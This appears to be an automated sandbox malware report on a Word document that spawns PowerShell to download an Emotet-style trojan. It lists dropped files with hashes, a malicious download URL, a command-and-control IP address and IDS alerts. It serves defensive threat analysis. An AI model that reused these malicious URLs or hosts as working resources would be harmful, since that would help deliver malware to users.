3452C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3544findstr cmC:\Windows\system32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1328cmd C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 186
Read events
1 704
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3048WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8E4C.tmp.cvr
MD5:
SHA256:
3048WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\679C23D1.jpg
MD5:
SHA256:
2376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HZCME5TZ477JR7VW95SX.temp
MD5:
SHA256:
2376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a53f.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3048WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$dfasdf.doc.xmlpgc
MD5:B3EC9598EB969B75F73E0F907E4E958C
SHA256:E28E34ADC25161750D91762A959E3B2480D37CDF4DE7F110461AC48E08277B04
2376powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3048WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A45EB704483E0EB1916FB65832D39E0D
SHA256:525B8EF4563638DDE742038C1CF6F23D020B7E7FB834DD8F4EE8E2464F18740D
2376powershell.exeC:\Users\admin\AppData\Local\Temp\784.exeexecutable
MD5:E3A822335FF17167EF126A8858F02457
SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5
2600784.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:E3A822335FF17167EF126A8858F02457
SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5
3048WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:655BC0B5E4ED3702A4AF6B1E0E5666CA
SHA256:DDFD001D5C9E36C32E770F3D64BCC7EAD1AE66CFBD0055052907A1A2ACB27D45
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2376
powershell.exe
GET
200
94.73.146.97:80
http://erdembulut.com/trEVDaG/
TR
executable
192 Kb
malicious
2376
powershell.exe
GET
301
94.73.146.97:80
http://erdembulut.com/trEVDaG
TR
html
1.12 Kb
malicious
2572
wabmetagen.exe
GET
200.125.113.60:8080
http://200.125.113.60:8080/
AR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2572
wabmetagen.exe
200.125.113.60:8080
Telecentro S.A.
AR
malicious
2376
powershell.exe
94.73.146.97:80
erdembulut.com
Cizgi Telekomunikasyon Anonim Sirketi
TR
malicious

DNS requests

Domain
IP
Reputation
erdembulut.com
  • 94.73.146.97
malicious

Threats

PID
Process
Class
Message
2376
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2376
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2376
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2376
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2376
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info